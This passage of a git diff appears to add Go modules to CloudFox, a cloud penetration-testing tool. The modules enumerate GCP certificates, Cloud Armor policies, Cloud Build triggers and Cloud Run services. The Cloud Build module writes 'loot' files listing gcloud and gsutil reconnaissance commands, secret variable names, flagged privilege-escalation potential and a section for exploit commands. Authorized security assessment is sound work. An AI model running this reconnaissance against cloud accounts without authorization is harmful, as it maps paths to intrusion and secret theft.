fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + for _, cert := range sslCerts { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + return body +} + +func (m *CertManagerModule) certMapsToTableBody(certMaps []certmanagerservice.CertificateMap) [][]string { + var body [][]string + for _, certMap := range certMaps { + body = append(body, []string{ + m.GetProjectName(certMap.ProjectID), + certMap.Name, + certMap.Location, + 
fmt.Sprintf("%d", certMap.EntryCount), + strings.Join(certMap.Certificates, ", "), + }) + } + return body +} + +func (m *CertManagerModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + certs := m.ProjectCertificates[projectID] + sslCerts := m.ProjectSSLCertificates[projectID] + if len(certs) > 0 || len(sslCerts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "certificates", + Header: m.getCertificatesHeader(), + Body: m.certsToTableBody(certs, sslCerts), + }) + } + + if certMaps, ok := m.ProjectCertMaps[projectID]; ok && len(certMaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "certificate-maps", + Header: m.getCertMapsHeader(), + Body: m.certMapsToTableBody(certMaps), + }) + } + + return tableFiles +} + +func (m *CertManagerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectCertificates { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSSLCertificates { + projectIDs[projectID] = true + } + for projectID := range m.ProjectCertMaps { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + outputData.ProjectLevelData[projectID] = CertManagerOutput{Table: tableFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + } +} + +func (m *CertManagerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allCerts 
:= m.getAllCertificates() + allSSLCerts := m.getAllSSLCertificates() + allCertMaps := m.getAllCertMaps() + + var tables []internal.TableFile + + if len(allCerts) > 0 || len(allSSLCerts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificates", + Header: m.getCertificatesHeader(), + Body: m.certsToTableBody(allCerts, allSSLCerts), + }) + } + + if len(allCertMaps) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificate-maps", + Header: m.getCertMapsHeader(), + Body: m.certMapsToTableBody(allCertMaps), + }) + } + + output := CertManagerOutput{Table: tables} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go new file mode 100644 index 00000000..a722bde7 --- /dev/null +++ b/gcp/commands/cloudarmor.go @@ -0,0 +1,371 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudArmorCommand = &cobra.Command{ + Use: globals.GCP_CLOUDARMOR_MODULE_NAME, + Aliases: []string{"armor", "waf", "security-policies"}, + Short: "Enumerate Cloud Armor security policies and find weaknesses", + Long: `Enumerate Cloud Armor security policies and identify misconfigurations. + +Cloud Armor provides DDoS protection and WAF (Web Application Firewall) capabilities +for Google Cloud load balancers. 
+ +Security Relevance: +- Misconfigured policies may not actually block attacks +- Preview-only rules don't block, just log +- Missing OWASP rules leave apps vulnerable to common attacks +- Unprotected load balancers have no WAF protection + +What this module finds: +- All Cloud Armor security policies +- Policy weaknesses and misconfigurations +- Rules in preview mode (not blocking) +- Load balancers without Cloud Armor protection +- Missing adaptive protection (DDoS)`, + Run: runGCPCloudArmorCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudArmorModule struct { + gcpinternal.BaseGCPModule + + ProjectPolicies map[string][]cloudarmorservice.SecurityPolicy // projectID -> policies + UnprotectedLBs map[string][]string // projectID -> LB names + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudArmorOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudArmorOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudArmorOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDARMOR_MODULE_NAME) + if err != nil { + return + } + + module := &CloudArmorModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPolicies: make(map[string][]cloudarmorservice.SecurityPolicy), + UnprotectedLBs: make(map[string][]string), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudArmorModule) getAllPolicies() []cloudarmorservice.SecurityPolicy { + var all []cloudarmorservice.SecurityPolicy + for _, policies := range m.ProjectPolicies { + all = 
append(all, policies...) + } + return all +} + +func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDARMOR_MODULE_NAME, m.processProject) + + // Count unprotected LBs + totalUnprotected := 0 + for _, lbs := range m.UnprotectedLBs { + totalUnprotected += len(lbs) + } + + allPolicies := m.getAllPolicies() + if len(allPolicies) == 0 && totalUnprotected == 0 { + logger.InfoM("No Cloud Armor policies found", globals.GCP_CLOUDARMOR_MODULE_NAME) + return + } + + // Count policies with weaknesses + weakPolicies := 0 + for _, policy := range allPolicies { + if len(policy.Weaknesses) > 0 { + weakPolicies++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d security policy(ies), %d with weaknesses, %d unprotected LB(s)", + len(allPolicies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + + if totalUnprotected > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d load balancer(s) have no Cloud Armor protection", totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + svc := cloudarmorservice.New() + + // Get security policies + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Armor security policies in project %s", projectID)) + } + + // Get unprotected LBs + unprotectedLBs, err := svc.GetUnprotectedLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + 
gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate unprotected load balancers in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPolicies[projectID] = policies + if len(unprotectedLBs) > 0 { + m.UnprotectedLBs[projectID] = unprotectedLBs + } + m.mu.Unlock() +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CloudArmorModule) getPoliciesHeader() []string { + return []string{"Project", "Policy", "Type", "Rules", "Adaptive", "DDoS", "Attached To", "Weaknesses"} +} + +func (m *CloudArmorModule) getRulesHeader() []string { + return []string{"Project", "Policy", "Priority", "Action", "Preview", "Match", "Rate Limit"} +} + +func (m *CloudArmorModule) getUnprotectedLBsHeader() []string { + return []string{"Project", "Backend Service", "Status"} +} + +func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { + var body [][]string + for _, policy := range policies { + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" + } + + ddos := "-" + if policy.DDOSProtection != "" { + ddos = policy.DDOSProtection + } + + resources := "-" + if len(policy.AttachedResources) > 0 { + resources = strings.Join(policy.AttachedResources, ", ") + } + + weaknesses := "-" + if len(policy.Weaknesses) > 0 { + weaknesses = strings.Join(policy.Weaknesses, "; ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + policy.Type, + fmt.Sprintf("%d", policy.RuleCount), + adaptive, + ddos, + resources, + weaknesses, + }) + } + return body +} + +func (m *CloudArmorModule) rulesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { + var body 
[][]string + for _, policy := range policies { + for _, rule := range policy.Rules { + preview := "No" + if rule.Preview { + preview = "Yes" + } + + rateLimit := "-" + if rule.RateLimitConfig != nil { + rateLimit = fmt.Sprintf("%d/%ds", rule.RateLimitConfig.ThresholdCount, rule.RateLimitConfig.IntervalSec) + } + + match := rule.Match + if len(match) > 80 { + match = match[:77] + "..." + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + fmt.Sprintf("%d", rule.Priority), + rule.Action, + preview, + match, + rateLimit, + }) + } + } + return body +} + +func (m *CloudArmorModule) unprotectedLBsToTableBody(projectID string, lbs []string) [][]string { + var body [][]string + for _, lb := range lbs { + body = append(body, []string{ + m.GetProjectName(projectID), + lb, + "UNPROTECTED", + }) + } + return body +} + +func (m *CloudArmorModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if policies, ok := m.ProjectPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "security-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(policies), + }) + + // Add rules table if there are rules + rulesBody := m.rulesToTableBody(policies) + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "security-policy-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + } + + if lbs, ok := m.UnprotectedLBs[projectID]; ok && len(lbs) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "unprotected-backend-services", + Header: m.getUnprotectedLBsHeader(), + Body: m.unprotectedLBsToTableBody(projectID, lbs), + }) + } + + return tableFiles +} + +func (m *CloudArmorModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + 
ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectPolicies { + projectIDs[projectID] = true + } + for projectID := range m.UnprotectedLBs { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + outputData.ProjectLevelData[projectID] = CloudArmorOutput{Table: tableFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } +} + +func (m *CloudArmorModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allPolicies := m.getAllPolicies() + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(allPolicies), + }) + } + + // Add rules table if there are rules + if len(allPolicies) > 0 { + rulesBody := m.rulesToTableBody(allPolicies) + if len(rulesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-policy-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + } + + // Build unprotected LBs table from all projects + var allUnprotectedBody [][]string + for projectID, lbs := range m.UnprotectedLBs { + allUnprotectedBody = append(allUnprotectedBody, m.unprotectedLBsToTableBody(projectID, lbs)...) 
+ } + if len(allUnprotectedBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "unprotected-backend-services", + Header: m.getUnprotectedLBsHeader(), + Body: allUnprotectedBody, + }) + } + + output := CloudArmorOutput{Table: tables} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } +} diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go new file mode 100644 index 00000000..02ba4d49 --- /dev/null +++ b/gcp/commands/cloudbuild.go @@ -0,0 +1,523 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudBuildCommand = &cobra.Command{ + Use: globals.GCP_CLOUDBUILD_MODULE_NAME, + Aliases: []string{"cb", "build", "builds"}, + Short: "Enumerate Cloud Build triggers and builds", + Long: `Enumerate Cloud Build triggers and recent build executions. 
+ +Features: +- Lists all build triggers +- Shows trigger source configuration (GitHub, CSR) +- Identifies service accounts used for builds +- Shows recent build executions +- Detects potentially risky trigger configurations`, + Run: runGCPCloudBuildCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type CloudBuildModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ProjectTriggers map[string][]cloudbuildservice.TriggerInfo // projectID -> triggers + ProjectBuilds map[string][]cloudbuildservice.BuildInfo // projectID -> builds + ProjectSecurityAnalysis map[string][]cloudbuildservice.TriggerSecurityAnalysis // projectID -> analysis + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper attack path analysis results + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type CloudBuildOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudBuildOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudBuildOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDBUILD_MODULE_NAME) + if err != nil { + return + } + + module := &CloudBuildModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTriggers: make(map[string][]cloudbuildservice.TriggerInfo), + ProjectBuilds: make(map[string][]cloudbuildservice.BuildInfo), + ProjectSecurityAnalysis: make(map[string][]cloudbuildservice.TriggerSecurityAnalysis), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + 
module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) + + allTriggers := m.getAllTriggers() + allBuilds := m.getAllBuilds() + + if len(allTriggers) == 0 && len(allBuilds) == 0 { + logger.InfoM("No Cloud Build triggers or builds found", globals.GCP_CLOUDBUILD_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d trigger(s), %d recent build(s)", + len(allTriggers), len(allBuilds)), globals.GCP_CLOUDBUILD_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *CloudBuildModule) getAllTriggers() []cloudbuildservice.TriggerInfo { + var all []cloudbuildservice.TriggerInfo + for _, triggers := range m.ProjectTriggers { + all = append(all, triggers...) + } + return all +} + +func (m *CloudBuildModule) getAllBuilds() []cloudbuildservice.BuildInfo { + var all []cloudbuildservice.BuildInfo + for _, builds := range m.ProjectBuilds { + all = append(all, builds...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Build in project: %s", projectID), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + cbSvc := cloudbuildservice.New() + + // Get triggers + triggers, err := cbSvc.ListTriggers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build triggers in project %s", projectID)) + } + + // Get recent builds + builds, err := cbSvc.ListBuilds(projectID, 20) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build builds in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectTriggers[projectID] = triggers + m.ProjectBuilds[projectID] = builds + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudbuild-details"] = &internal.LootFile{ + Name: "cloudbuild-details", + Contents: "# Cloud Build Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + var projectAnalysis []cloudbuildservice.TriggerSecurityAnalysis + for _, trigger := range triggers { + m.addTriggerToLoot(projectID, trigger) + // Perform security analysis + analysis := cbSvc.AnalyzeTriggerForPrivesc(trigger, projectID) + projectAnalysis = append(projectAnalysis, analysis) + m.addSecurityAnalysisToLoot(projectID, analysis) + } + m.ProjectSecurityAnalysis[projectID] = projectAnalysis + + // Add build step analysis to loot + for _, build := range builds { + m.addBuildToLoot(projectID, build) + } + m.mu.Unlock() +} + +// 
------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudBuildModule) addTriggerToLoot(projectID string, trigger cloudbuildservice.TriggerInfo) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + + // Build flags for special attributes + var flags []string + if trigger.PrivescPotential { + flags = append(flags, "PRIVESC POTENTIAL") + } + if trigger.Disabled { + flags = append(flags, "DISABLED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUILD TRIGGER: %s%s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# ID: %s\n"+ + "# Source: %s - %s\n"+ + "# Branch/Tag: %s, Config: %s\n"+ + "# Service Account: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe trigger:\n"+ + "gcloud builds triggers describe %s --project=%s\n", + trigger.Name, flagStr, + trigger.ProjectID, + trigger.ID, + trigger.SourceType, trigger.RepoName, + branchTag, trigger.Filename, + sa, + trigger.ID, trigger.ProjectID, + ) +} + +func (m *CloudBuildModule) addSecurityAnalysisToLoot(projectID string, analysis cloudbuildservice.TriggerSecurityAnalysis) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + + // Add exploitation commands if available + if len(analysis.ExploitCommands) > 0 { + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + for _, cmd := range analysis.ExploitCommands { + lootFile.Contents += fmt.Sprintf("# %s\n", cmd) + } + } + lootFile.Contents += "\n" +} + +func (m *CloudBuildModule) addBuildToLoot(projectID string, build 
cloudbuildservice.BuildInfo) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# BUILD: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Status: %s\n"+ + "# Trigger: %s, Source: %s\n", + buildID, + build.ProjectID, build.Status, + build.TriggerID, build.Source, + ) + + // Log location + if build.LogsBucket != "" { + lootFile.Contents += fmt.Sprintf( + "Logs: gsutil cat %s/log-%s.txt\n", + build.LogsBucket, build.ID, + ) + } + + // Secret environment variables + if len(build.SecretEnvVars) > 0 { + lootFile.Contents += "Secret Env Vars:\n" + for _, secret := range build.SecretEnvVars { + lootFile.Contents += fmt.Sprintf(" - %s\n", secret) + } + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Log privesc count + privescCount := 0 + for _, triggers := range m.ProjectTriggers { + for _, trigger := range triggers { + if trigger.PrivescPotential { + privescCount++ + } + } + } + if privescCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CloudBuildModule) getTriggersHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Source", + "Repository", + "Branch/Tag", + "Config File", + "Service Account", + "SA Attack Paths", + "Disabled", + "Privesc Potential", + } +} + +func (m *CloudBuildModule) 
getBuildsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "ID", + "Status", + "Trigger", + "Source", + "Created", + } +} + +func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.TriggerInfo) [][]string { + var body [][]string + for _, trigger := range triggers { + disabled := "No" + if trigger.Disabled { + disabled = "Yes" + } + + privescPotential := "No" + if trigger.PrivescPotential { + privescPotential = "Yes" + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + body = append(body, []string{ + m.GetProjectName(trigger.ProjectID), + trigger.ProjectID, + trigger.Name, + trigger.SourceType, + trigger.RepoName, + branchTag, + trigger.Filename, + sa, + attackPaths, + disabled, + privescPotential, + }) + } + return body +} + +func (m *CloudBuildModule) buildsToTableBody(builds []cloudbuildservice.BuildInfo) [][]string { + var body [][]string + for _, build := range builds { + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + body = append(body, []string{ + m.GetProjectName(build.ProjectID), + build.ProjectID, + buildID, + build.Status, + build.TriggerID, + build.Source, + build.CreateTime, + }) + } + return body +} + +func (m *CloudBuildModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if triggers, ok := m.ProjectTriggers[projectID]; ok && len(triggers) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudbuild-triggers", + Header: m.getTriggersHeader(), + Body: 
m.triggersToTableBody(triggers), + }) + } + + if builds, ok := m.ProjectBuilds[projectID]; ok && len(builds) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudbuild-builds", + Header: m.getBuildsHeader(), + Body: m.buildsToTableBody(builds), + }) + } + + return tableFiles +} + +func (m *CloudBuildModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectTriggers { + projectIDs[projectID] = true + } + for projectID := range m.ProjectBuilds { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudBuildOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + } +} + +func (m *CloudBuildModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allTriggers := m.getAllTriggers() + allBuilds := m.getAllBuilds() + + var tables []internal.TableFile + + if len(allTriggers) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-triggers", + Header: m.getTriggersHeader(), + Body: m.triggersToTableBody(allTriggers), + }) + } + 
+ if len(allBuilds) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-builds", + Header: m.getBuildsHeader(), + Body: m.buildsToTableBody(allBuilds), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := CloudBuildOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go new file mode 100644 index 00000000..2bca99ee --- /dev/null +++ b/gcp/commands/cloudrun.go @@ -0,0 +1,688 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudRunCommand = &cobra.Command{ + Use: globals.GCP_CLOUDRUN_MODULE_NAME, + Aliases: []string{"run", "cr"}, + Short: "Enumerate Cloud Run services and jobs with security analysis", + Long: `Enumerate Cloud Run services and jobs across projects with security-relevant details. 
+ +Features: +- Lists all Cloud Run services and jobs +- Shows security configuration (ingress, VPC, service account) +- Identifies publicly invokable services (allUsers/allAuthenticatedUsers) +- Shows container image, resources, and scaling configuration +- Counts environment variables and secret references +- Generates gcloud commands for further analysis + +Security Columns: +- Ingress: INGRESS_TRAFFIC_ALL (public), INTERNAL_ONLY, or INTERNAL_LOAD_BALANCER +- Public: Whether allUsers or allAuthenticatedUsers can invoke the service +- Service Account: The identity the service runs as +- SA Attack Paths: Privesc/exfil/lateral movement potential (run foxmapper first) +- VPC Access: Network connectivity to VPC resources +- Env Vars: Count of plain environment variables +- Secret Mgr: Count of env vars referencing Secret Manager (secure storage) +- Hardcoded: Detected secrets in env var VALUES (API keys, passwords, tokens) + +Attack Surface: +- Public services with ALL ingress are internet-accessible +- Services with default service account may have excessive permissions +- VPC-connected services can access internal resources +- Container images may contain vulnerabilities or secrets +- Hardcoded secrets in env vars are a critical security risk + +TIP: Run foxmapper first to populate the SA Attack Paths column.`, + Run: runGCPCloudRunCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudRunModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectServices map[string][]CloudRunService.ServiceInfo // projectID -> services + ProjectJobs map[string][]CloudRunService.JobInfo // projectID -> 